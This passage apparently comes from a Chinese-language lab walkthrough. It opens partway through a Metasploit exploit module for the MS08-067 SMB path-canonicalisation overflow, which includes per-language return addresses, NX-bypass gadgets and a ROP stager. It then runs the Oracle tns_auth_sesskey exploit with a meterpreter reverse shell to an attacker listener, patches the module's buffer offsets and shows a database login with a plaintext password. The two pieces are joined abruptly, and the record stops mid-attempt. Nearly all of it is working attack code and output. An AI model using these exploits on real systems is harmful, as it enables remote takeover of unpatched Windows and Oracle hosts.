          ['Windows XP SP3 Korean (NX)',
           {
             'Ret'       => 0x6fd6f807,
             'DisableNX' => 0x6fd717c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Dutch (NX)',
           {
             'Ret'       => 0x596cf807,
             'DisableNX' => 0x596d17c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Norwegian (NX)',
           {
             'Ret'       => 0x597cf807,
             'DisableNX' => 0x597d17c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Polish (NX)',
           {
             'Ret'       => 0x5941f807,
             'DisableNX' => 0x594217c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Portuguese - Brazilian (NX)',
           {
             'Ret'       => 0x596ff807,
             'DisableNX' => 0x597017c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Portuguese (NX)',
           {
             'Ret'       => 0x596bf807,
             'DisableNX' => 0x596c17c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Russian (NX)',
           {
             'Ret'       => 0x6fe1f807,
             'DisableNX' => 0x6fe217c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Swedish (NX)',
           {
             'Ret'       => 0x597af807,
             'DisableNX' => 0x597b17c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Turkish (NX)',
           {
             'Ret'       => 0x5a78f807,
             'DisableNX' => 0x5a7917c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          #
          # Windows 2003 Targets
          #

          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP1 English (NO NX)',
           {
             'Ret'       => 0x71bf21a2,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI WS2HELP.DLL

          # Brett Moore's crafty NX bypass for 2003 SP1
          ['Windows 2003 SP1 English (NX)',
           {
             'RetDec'    => 0x7c90568c,  # dec ESI, ret @SHELL32.DLL
             'RetPop'    => 0x7ca27cf4,  # push ESI, pop EBP, ret @SHELL32.DLL
             'JmpESP'    => 0x7c86fed3,  # jmp ESP @NTDLL.DLL
             'DisableNX' => 0x7c83e413,  # NX disable @NTDLL.DLL
             'Scratch'   => 0x00020408,
           }
          ],

          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP1 Japanese (NO NX)',
           {
             'Ret'       => 0x71a921a2,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI WS2HELP.DLL

          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP1 Spanish (NO NX)',
           {
             'Ret'       => 0x71ac21a2,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI WS2HELP.DLL

          # Brett Moore's crafty NX bypass for 2003 SP1
          ['Windows 2003 SP1 Spanish (NX)',
           {
             'RetDec'    => 0x7c90568c,  # dec ESI, ret @SHELL32.DLL
             'RetPop'    => 0x7ca27cf4,  # push ESI, pop EBP, ret @SHELL32.DLL
             'JmpESP'    => 0x7c86fed3,  # jmp ESP @NTDLL.DLL
             'DisableNX' => 0x7c83e413,  # NX disable @NTDLL.DLL
             'Scratch'   => 0x00020408,
           }
          ],
          # Standard return-to-ESI without NX bypass
          # Added by Omar MEZRAG - 0xFFFFFF
          [ 'Windows 2003 SP1 French (NO NX)',
            {
              'Ret'       => 0x71ac1c40 ,
              'Scratch'   => 0x00020408
            }
          ], # JMP ESI WS2HELP.DLL

          # Brett Moore's crafty NX bypass for 2003 SP1
          # Added by Omar MEZRAG - 0xFFFFFF
          [ 'Windows 2003 SP1 French (NX)',
            {
              'RetDec'    => 0x7CA2568C,  # dec ESI, ret @SHELL32.DLL
              'RetPop'    => 0x7CB47CF4,  # push ESI, pop EBP, ret 4 @SHELL32.DLL
              'JmpESP'    => 0x7C98FED3,  # jmp ESP @NTDLL.DLL
              'DisableNX' => 0x7C95E413,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408
            }
          ],

          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP2 English (NO NX)',
           {
             'Ret'       => 0x71bf3969,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI WS2HELP.DLL

          # Brett Moore's crafty NX bypass for 2003 SP2
          ['Windows 2003 SP2 English (NX)',
           {
             'RetDec'    => 0x7c86beb8,  # dec ESI, ret @NTDLL.DLL
             'RetPop'    => 0x7ca1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
             'JmpESP'    => 0x7c86a01b,  # jmp ESP @NTDLL.DLL
             'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
             'Scratch'   => 0x00020408,
           }
          ],

          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP2 German (NO NX)',
           {
             'Ret'       => 0x71a03969,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI WS2HELP.DLL

          # Brett Moore's crafty NX bypass for 2003 SP2
          ['Windows 2003 SP2 German (NX)',
           {
             'RetDec'    => 0x7c98beb8,  # dec ESI, ret @NTDLL.DLL
             'RetPop'    => 0x7cb3e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
             'JmpESP'    => 0x7c98a01b,  # jmp ESP @NTDLL.DLL
             'DisableNX' => 0x7c95f517,  # NX disable @NTDLL.DLL
             'Scratch'   => 0x00020408,
           }
          ],

          # Brett Moore's crafty NX bypass for 2003 SP2
          [ 'Windows 2003 SP2 Portuguese (NX)',
            {
              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL OK
              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL OK
              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL OK
              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408,
            }
          ],

          # Brett Moore's crafty NX bypass for 2003 SP2 (target by Anderson Bargas)
          [ 'Windows 2003 SP2 Portuguese - Brazilian (NX)',
            {
              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL OK
              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL OK
              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL OK
              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408,
            }
          ],

          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP2 Spanish (NO NX)',
           {
             'Ret'       => 0x71ac3969,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI WS2HELP.DLL

          # Brett Moore's crafty NX bypass for 2003 SP2
          ['Windows 2003 SP2 Spanish (NX)',
           {
             'RetDec'    => 0x7c86beb8,  # dec ESI, ret @NTDLL.DLL
             'RetPop'    => 0x7ca1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
             'JmpESP'    => 0x7c86a01b,  # jmp ESP @NTDLL.DLL
             'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
             'Scratch'   => 0x00020408,
           }
          ],

          # Standard return-to-ESI without NX bypass
          # Provided by Masashi Fujiwara
          ['Windows 2003 SP2 Japanese (NO NX)',
           {
             'Ret'       => 0x71a91ed2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI WS2HELP.DLL

          # Standard return-to-ESI without NX bypass
          # Added by Omar MEZRAG - 0xFFFFFF
          [ 'Windows 2003 SP2 French (NO NX)',
            {
              'Ret'       => 0x71AC2069,
              'Scratch'   => 0x00020408
            }
          ], # CALL ESI WS2HELP.DLL

          # Brett Moore's crafty NX bypass for 2003 SP2
          # Added by Omar MEZRAG - 0xFFFFFF
          [ 'Windows 2003 SP2 French (NX)',
            {
              'RetDec'    => 0x7C98BEB8,  # dec ESI, ret @NTDLL.DLL
              'RetPop'    => 0x7CB3E84E,  # push ESI, pop EBP, ret @SHELL32.DLL
              'JmpESP'    => 0x7C98A01B,  # jmp ESP @NTDLL.DLL
              'DisableNX' => 0x7C95F517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408
            }
          ],

          # Brett Moore's crafty NX bypass for 2003 SP2
          [ 'Windows 2003 SP2 Chinese - Simplified (NX)',
            {
              'RetDec'    => 0x7c99beb8,  # dec ESI, ret @NTDLL.DLL
              'RetPop'    => 0x7cb5e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
              'JmpESP'    => 0x7c99a01b,  # jmp ESP @NTDLL.DLL
              'DisableNX' => 0x7c96f517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408,
            }
          ],

          # Brett Moore's crafty NX bypass for 2003 SP2
          [ 'Windows 2003 SP2 Czech (NX)',
            {
              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
              'RetPop'    => 0x7cb1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408,
            }
          ],

          # Brett Moore's crafty NX bypass for 2003 SP2
          [ 'Windows 2003 SP2 Dutch (NX)',
            {
              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408,
            }
          ],

          # Brett Moore's crafty NX bypass for 2003 SP2
          [ 'Windows 2003 SP2 Hungarian (NX)',
            {
              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408,
            }
          ],

          # Brett Moore's crafty NX bypass for 2003 SP2
          [ 'Windows 2003 SP2 Italian (NX)',
            {
              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408,
            }
          ],

          # Brett Moore's crafty NX bypass for 2003 SP2
          [ 'Windows 2003 SP2 Russian (NX)',
            {
              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408,
            }
          ],

          # Brett Moore's crafty NX bypass for 2003 SP2
          [ 'Windows 2003 SP2 Swedish (NX)',
            {
              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408,
            }
          ],

          # Brett Moore's crafty NX bypass for 2003 SP2
          [ 'Windows 2003 SP2 Turkish (NX)',
            {
              'RetDec'    => 0x7c96beb8,  # dec ESI, ret @NTDLL.DLL
              'RetPop'    => 0x7cb1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
              'JmpESP'    => 0x7c96a01b,  # jmp ESP @NTDLL.DLL
              'DisableNX' => 0x7c93f517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408,
            }
          ],

          #
          # Missing Targets
          # Key:   T=TODO   ?=UNKNOWN   U=UNRELIABLE
          #
          # [?] Windows Vista SP0 - Not tested yet
          # [?] Windows Vista SP1 - Not tested yet
          #
        ],

      'DisclosureDate' => '2008-10-28'))

    register_options(
      [
        OptString.new('SMBPIPE', [true,  'The pipe name to use (BROWSER, SRVSVC)', 'BROWSER']),
      ])

    deregister_options('SMB::ProtocolVersion')
  end

  #
  #
  #   *** WINDOWS XP SP2/SP3 TARGETS ***
  #
  #
  #   This exploit bypasses NX/NX by returning to a function call inside acgenral.dll that disables NX
  #   for the process and then returns back to a call ESI instruction. These addresses are different
  #   between operating systems, service packs, and language packs, but the steps below can be used to
  #   add new targets.
  #
  #
  #   If the target system does not have NX/NX, just place a "call ESI" return into both the Ret	and
  #   DisableNX elements of the target hash.
  #
  #   If the target system does have NX/NX, obtain a copy of the acgenral.dll from that system.
  #   First obtain the value for the Ret element of the hash with the following command:
  #
  #   $ msfpescan -j esi acgenral.dll
  #
  #   Pick whatever address you like, just make sure it does not contain 00 0a 0d 5c 2f or 2e.
  #
  #   Next, find the location of the function we use to disable NX. Use the following command:
  #
  #   $ msfpescan -r "\x6A\x04\x8D\x45\x08\x50\x6A\x22\x6A\xFF" acgenral.dll
  #
  #   This address should be placed into the DisableNX element of the target hash.
  #
  #   The Scratch element of 0x00020408 should work on all versions of Windows
  #
  #   The actual function we use to disable NX looks like this:
  #
  #     push    4
  #     lea     eax, [ebp+arg_0]
  #     push    eax
  #     push    22h
  #     push    0FFFFFFFFh
  #     mov     [ebp+arg_0], 2
  #     call    ds:__imp__NtSetInformationProcess@16
  #
  #
  #   *** WINDOWS XP NON-NX TARGETS ***
  #
  #
  #   Instead of bypassing NX, just return directly to a "JMP ESI", which takes us to the short
  #   jump, and finally the shellcode.
  #
  #
  #   *** WINDOWS 2003 SP2 TARGETS ***
  #
  #
  #   There are only two possible ways to return to NtSetInformationProcess on Windows 2003 SP2,
  #   both of these are inside NTDLL.DLL and use a return method that is not directly compatible
  #   with our call stack. To solve this, Brett Moore figured out a multi-step return call chain
  #   that eventually leads to the NX bypass function.
  #
  #
  #   *** WINDOWS 2000 TARGETS ***
  #
  #
  #   No NX to bypass, just return directly to a "JMP EDX", which takes us to the short
  #   jump, and finally the shellcode.
  #
  #
  #   *** WINDOWS VISTA TARGETS ***
  #
  #   Currently untested, will involve ASLR and NX, should be fun.
  #
  #
  #   *** NetprPathCanonicalize IDL ***
  #
  #
  #   NET_API_STATUS NetprPathCanonicalize(
  #   [in, string, unique] SRVSVC_HANDLE ServerName,
  #   [in, string] WCHAR* PathName,
  #   [out, size_is(OutbufLen)] unsigned char* Outbuf,
  #   [in, range(0,64000)] DWORD OutbufLen,
  #   [in, string] WCHAR* Prefix,
  #   [in, out] DWORD* PathType,
  #   [in] DWORD Flags
  #   );
  #

  def exploit
    begin
      connect(versions: [1])
      smb_login
    rescue Rex::Proto::SMB::Exceptions::LoginError => e
      if e.message =~ /Connection reset/
        print_error('Connection reset during login')
        print_error('This most likely means a previous exploit attempt caused the service to crash')
        return
      else
        raise e
      end
    end

    # Use a copy of the target
    mytarget = target

    if target['auto']

      mytarget = nil

      print_status('Automatically detecting the target...')
      fprint = smb_fingerprint

      print_status("Fingerprint: #{fprint['os']} - #{fprint['sp']} - lang:#{fprint['lang']}")

      # Bail early on unknown OS
      if (fprint['os'] == 'Unknown')
        fail_with(Failure::NoTarget, 'No matching target')
      end

      # Windows 2000 is mostly universal
      if (fprint['os'] == 'Windows 2000')
        mytarget = targets[1]
      end

      # Windows XP SP0/SP1 is mostly universal
      if fprint['os'] == 'Windows XP' and fprint['sp'] == 'Service Pack 0 / 1'
        mytarget = targets[2]
      end

      # Windows 2003 SP0 is mostly universal
      if fprint['os'] == 'Windows 2003' and fprint['sp'].empty?
        mytarget = targets[3]
      end

      # Windows 2003 R2 is treated the same as 2003
      if (fprint['os'] == 'Windows 2003 R2')
        fprint['os'] = 'Windows 2003'
      end

      # Service Pack match must be exact
      if (not mytarget) and fprint['sp'].index('+')
        print_error('Could not determine the exact service pack')
        print_error("Auto-targeting failed, use 'show targets' to manually select one")
        disconnect
        return
      end

      # Language Pack match must be exact or we default to English
      if (not mytarget) and fprint['lang'] == 'Unknown'
        print_status('We could not detect the language pack, defaulting to English')
        fprint['lang'] = 'English'
      end

      # Normalize the service pack string
      fprint['sp'].gsub!(/Service Pack\s+/, 'SP')

      unless mytarget
        targets.each do |t|
          # Prefer AlwaysOn NX over NX, and NX over non-NX
          if t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \(AlwaysOn NX\)/
            mytarget = t
            break
          end
          if t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \(NX\)/
            mytarget = t
            break
          end
        end
      end

      unless mytarget
        fail_with(Failure::NoTarget, 'No matching target')
      end

      print_status("Selected Target: #{mytarget.name}")
    end

    #
    # Build the malicious path name
    #

    padder = [*('A'..'Z')]
    pad = 'A'
    while pad.length < 7
      c = padder[rand(padder.length)]
      next if pad.index(c)
      pad += c
    end

    prefix = '\\'
    path   = ''
    server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase

    #
    # Windows 2003 SP2 (NX) targets
    #
    if mytarget['RetDec']

      jumper = Rex::Text.rand_text_alpha(70).upcase
      jumper[ 0, 4] = [mytarget['RetDec']].pack('V') # one more to Align and make room

      jumper[ 4, 4] = [mytarget['RetDec']].pack('V') # 4 more for space
      jumper[ 8, 4] = [mytarget['RetDec']].pack('V')
      jumper[ 12, 4] = [mytarget['RetDec']].pack('V')
      jumper[ 16, 4] = [mytarget['RetDec']].pack('V')

      jumper[ 20, 4] = [mytarget['RetPop']].pack('V') # pop to EBP
      jumper[ 24, 4] = [mytarget['DisableNX']].pack('V')

      jumper[ 56, 4] = [mytarget['JmpESP']].pack('V')
      jumper[ 60, 4] = [mytarget['JmpESP']].pack('V')
      jumper[ 64, 2] = "\xeb\x02"                    # our jump
      jumper[ 68, 2] = "\xeb\x62"                    # original

      path =
        Rex::Text.to_unicode('\\') +

        # This buffer is removed from the front
        Rex::Text.rand_text_alpha(100) +

        # Shellcode
        payload.encoded +

        # Relative path to trigger the bug
        Rex::Text.to_unicode('\\..\\..\\') +

        # Extra padding
        Rex::Text.to_unicode(pad) +

        # Writable memory location (static)
        [mytarget['Scratch']].pack('V') + # EBP

        # Return to code which disables NX (or just the return)
        [mytarget['RetDec']].pack('V') +

        # Padding with embedded jump
        jumper +

        # NULL termination
        "\x00" * 2

    #
    # Windows XP SP2/SP3 ROP Stager targets
    #
    elsif mytarget['UseROP']

      rop = generate_rop(mytarget['UseROP'])

      path =
        Rex::Text.to_unicode('\\') +

        # This buffer is removed from the front
        Rex::Text.rand_text_alpha(100) +

        # Shellcode
        payload.encoded +

        # Relative path to trigger the bug
        Rex::Text.to_unicode('\\..\\..\\') +

        # Extra padding
        Rex::Text.to_unicode(pad) +

        # ROP Stager
        rop +

        # Padding (skipped)
        Rex::Text.rand_text_alpha(2) +

        # NULL termination
        "\x00" * 2

    #
    # Windows 2000, XP (NX), and 2003 (NO NX) targets
    #
    else

      jumper = Rex::Text.rand_text_alpha(70).upcase
      jumper[ 4, 4] = [mytarget.ret].pack('V')
      jumper[50, 8] = make_nops(8)
      jumper[58, 2] = "\xeb\x62"

      path =
        Rex::Text.to_unicode('\\') +

        # This buffer is removed from the front
        Rex::Text.rand_text_alpha(100) +

        # Shellcode
        payload.encoded +

        # Relative path to trigger the bug
        Rex::Text.to_unicode('\\..\\..\\') +

        # Extra padding
        Rex::Text.to_unicode(pad) +

        # Writable memory location (static)
        [mytarget['Scratch']].pack('V') + # EBP

        # Return to code which disables NX (or just the return)
        [mytarget['DisableNX'] || mytarget.ret].pack('V') +

        # Padding with embedded jump
        jumper +

        # NULL termination
        "\x00" * 2

    end

    handle = dcerpc_handle(
      '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
      'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
    )

    dcerpc_bind(handle)

    stub =
      NDR.uwstring(server) +
      NDR.UnicodeConformantVaryingStringPreBuilt(path) +
      NDR.long(rand(1024)) +
      NDR.wstring(prefix) +
      NDR.long(4097) +
      NDR.long(0)

    # NOTE: we don't bother waiting for a response here...
    print_status('Attempting to trigger the vulnerability...')
    dcerpc.call(0x1f, stub, false)

    # Cleanup
    handler
    disconnect
  end

  def check
    begin
      connect(versions: [1])
      smb_login
    rescue Rex::ConnectionError => e
      vprint_error("Connection failed: #{e.class}: #{e}")
      return Msf::Exploit::CheckCode::Unknown
    rescue Rex::Proto::SMB::Exceptions::LoginError => e
      if e.message =~ /Connection reset/
        vprint_error('Connection reset during login')
        vprint_error('This most likely means a previous exploit attempt caused the service to crash')
        return Msf::Exploit::CheckCode::Unknown
      else
        raise e
      end
    end

    #
    # Build the malicious path name
    # 5b878ae7 "db @eax;g"
    prefix = '\\'
    path =
      "\x00\\\x00/" * 0x10 +
      Rex::Text.to_unicode('\\') +
      Rex::Text.to_unicode('R7') +
      Rex::Text.to_unicode('\\..\\..\\') +
      Rex::Text.to_unicode('R7') +
      "\x00" * 2

    server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase

    handle = dcerpc_handle('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
                           'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
    )

    begin
      # Samba doesn't have this handle and returns an ErrorCode
      dcerpc_bind(handle)
    rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
      vprint_error("SMB error: #{e.message}")
      return Msf::Exploit::CheckCode::Safe
    end

    vprint_status('Verifying vulnerable status... (path: 0x%08x)' % path.length)

    stub =
      NDR.uwstring(server) +
      NDR.UnicodeConformantVaryingStringPreBuilt(path) +
      NDR.long(8) +
      NDR.wstring(prefix) +
      NDR.long(4097) +
      NDR.long(0)

    resp = dcerpc.call(0x1f, stub)
    error = resp[4, 4].unpack('V')[0]

    # Cleanup
    simple.client.close
    simple.client.tree_disconnect
    disconnect

    if (error == 0x0052005c) # \R :)
      return Msf::Exploit::CheckCode::Vulnerable
    else
      vprint_error('System is not vulnerable (status: 0x%08x)' % error) if error
      return Msf::Exploit::CheckCode::Safe
    end
  end

  def generate_rop(version)
    free_byte = "\x90"
    # free_byte = "\xcc"

    # create a few small gadgets
    #  <free byte>; pop edx; pop ecx; ret
    gadget1 = free_byte + "\x5a\x59\xc3"
    #  mov edi, eax; add edi,0xc; push 0x40; pop ecx; rep movsd
    gadget2 = free_byte + "\x89\xc7" + "\x83\xc7\x0c" + "\x6a\x7f" + "\x59" + "\xf2\xa5" + free_byte
    #  <must complete \x00 two byte opcode>; <free_byte>; jmp $+0x5c
    gadget3 = "\xcc" + free_byte + "\xeb\x5a"

    # gadget2:
    #  get eax into edi
    #  adjust edi
    #  get 0x7f in ecx
    #  copy the data
    #  jmp to it
    #
    dws = gadget2.unpack('V*')

    ##
    # Create the ROP stager, pfew.. Props to corelanc0d3r!
    # This was no easy task due to space limitations :-/
    # -jduck
    ##
    module_name = 'ACGENRAL.DLL'
    module_base = 0x6f880000

    rvasets = {}
    # XP SP2
    rvasets['5.1.2600.2180'] = {
      # call [imp_HeapCreate] / mov [0x6f8b8024], eax / ret
      'call_HeapCreate'                          => 0x21064,
      'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e546,
      'pop ecx / ret'                            => 0x2e546 + 6,
      'mov [eax], ecx / ret'                     => 0xd182,
      'jmp eax'                                  => 0x19b85,
      'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10976,
      'mov [eax+0x10], ecx / ret'                => 0x10976 + 6,
      'add eax, 8 / ret'                         => 0x29a14
    }

    # XP SP3
    rvasets['5.1.2600.5512'] = {
      # call [imp_HeapCreate] / mov [0x6f8b02c], eax / ret
      'call_HeapCreate'                          => 0x21286,
      'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e796,
      'pop ecx / ret'                            => 0x2e796 + 6,
      'mov [eax], ecx / ret'                     => 0xd296,
      'jmp eax'                                  => 0x19c6f,
      'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10a56,
      'mov [eax+0x10], ecx / ret'                => 0x10a56 + 6,
      'add eax, 8 / ret'                         => 0x29c64
    }

    # HeapCreate ROP Stager from ACGENRAL.DLL 5.1.2600.2180
    rop = [
      # prime ebp (adjustment distance)
      0x00018000,

      # get some RWX memory via HeapCreate
      'call_HeapCreate',
      0x01040110, # flOptions (gets & with 0x40005)
      0x01010101,
      0x01010101,

      # adjust the returned pointer
      'add eax, ebp / mov ecx, 0x59ffffa8 / ret',

      # setup gadget1
      'pop ecx / ret',
      gadget1.unpack('V').first,
      'mov [eax], ecx / ret',

      # execute gadget1
      'jmp eax',

      # setup gadget2 (via gadget1)
      dws[0],
      dws[1],
      'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret',

      # setup part3 of gadget2
      'pop ecx / ret',
      dws[2],
      'mov [eax+0x10], ecx / ret',

      # execute gadget2
      'add eax, 8 / ret',
      'jmp eax',

      # gadget3 gets executed after gadget2 (luckily)
      gadget3.unpack('V').first
    ]

    # convert the meta rop into concrete bytes
    rvas = rvasets[version]

    rop.map! { |e|
      if e.kind_of? String
        # Meta-replace (RVA)
        fail_with(Failure::BadConfig, "Unable to locate key: \"#{e}\"") unless rvas[e]
        module_base + rvas[e]

      elsif e == :unused
        # Randomize
        rand_text(4).unpack('V').first

      else
        # Literal
        e
      end
    }

    ret = rop.pack('V*')

    # check badchars?
    # idx = Rex::Text.badchar_index(ret, payload_badchars)

    ret
  end
end

Oracle tns_auth_sesskey

use exploit/windows/oracle/tns_auth_sesskey
set payload windows/meterpreter/reverse_tcp
set RHOSTS 10.10.10.130
set LHOST 10.10.10.128
set LPORT 5000
set target 1
exploit
msf6 exploit(windows/oracle/tns_auth_sesskey) > exploit
[*] Started reverse TCP handler on 10.10.10.128:5000
[*] 10.10.10.130:1521 - Attacking using target "Oracle 10.2.0.1.0 Enterprise Edition"
[*] 10.10.10.130:1521 - Sending NSPTCN packet ...
[*] 10.10.10.130:1521 - Re-sending NSPTCN packet ...
[*] 10.10.10.130:1521 - Sending NA packet ...
[*] 10.10.10.130:1521 - Sending TTIPRO packet ...
[*] 10.10.10.130:1521 - Sending TTIDTY packet ...
[*] 10.10.10.130:1521 - Calling OSESSKEY ...
[*] 10.10.10.130:1521 - Calling kpoauth with long AUTH_SESSKEY ...
[*] Exploit completed, but no session was created.

提示“no session was created”

根据书中提示信息,修改tns_auth_sesskey.rb源代码

C:\metasploit-framework\embedded\framework\modules\exploits\windows\oracle\tns_auth_sesskey.rb
    # build exploit buffer
    print_status("Calling kpoauth with long AUTH_SESSKEY ...")
    sploit = payload.encoded
    sploit << rand_text_alphanumeric(0x19a - 0x17e)
    sploit << generate_seh_record(mytarget.ret)
    distance = payload_space + 8 + 5
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string

    # ensure bad ptr is derefed
    value = rand(0x3fffffff) | 0xc0000000
    sploit[0x17e,4] = [value].pack('V')

    # send overflow trigger packet (call kpoauth)
    params = []
    params << {
      'Name'   => 'AUTH_SESSKEY',
      'Value'  => sploit,
      'Flag'   => 1
    }
    dtyauth_pkt = dtyauth_packet(0x73, username, 0x121, params)
    sock.put(dtyauth_pkt)

修改为

    # build exploit buffer
    print_status("Calling kpoauth with long AUTH_SESSKEY ...")
    sploit = payload.encoded
    sploit << rand_text_alphanumeric(0x19a - 0x17e + 0x10)
    sploit << generate_seh_record(mytarget.ret)
    distance = payload_space + 8 + 5 + 0x20
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string

    # ensure bad ptr is derefed
    value = rand(0x3fffffff) | 0xc0000000
    sploit[0x17e,4] = [value].pack('V')

    # send overflow trigger packet (call kpoauth)
    params = []
    params << {
      'Name'   => 'AUTH_SESSKEY',
      'Value'  => sploit,
      'Flag'   => 1
    }
    dtyauth_pkt = dtyauth_packet(0x73, username, 0x121, params)
    sock.put(dtyauth_pkt)

根据桌面上的oracle startup.txt中提示信息,启动Oracle
在这里插入图片描述

C:\oracle\product\10.2.0\db_1\BIN\sqlplus.exe /nolog
conn sys/mima1234 as sysdba
startup

在这里插入图片描述

msf6 exploit(windows/oracle/tns_auth_sesskey) > rexploit
[*] Reloading module...

[*] Started reverse TCP handler on 10.10.10.128:5000
[*] 10.10.10.130:1521 - Attacking using target "Oracle 10.2.0.1.0 Enterprise Edition"
[*] 10.10.10.130:1521 - Sending NSPTCN packet ...
[*] 10.10.10.130:1521 - Re-sending NSPTCN packet ...
[*] 10.10.10.130:1521 - Sending NA packet ...
[*] 10.10.10.130:1521 - Sending TTIPRO packet ...
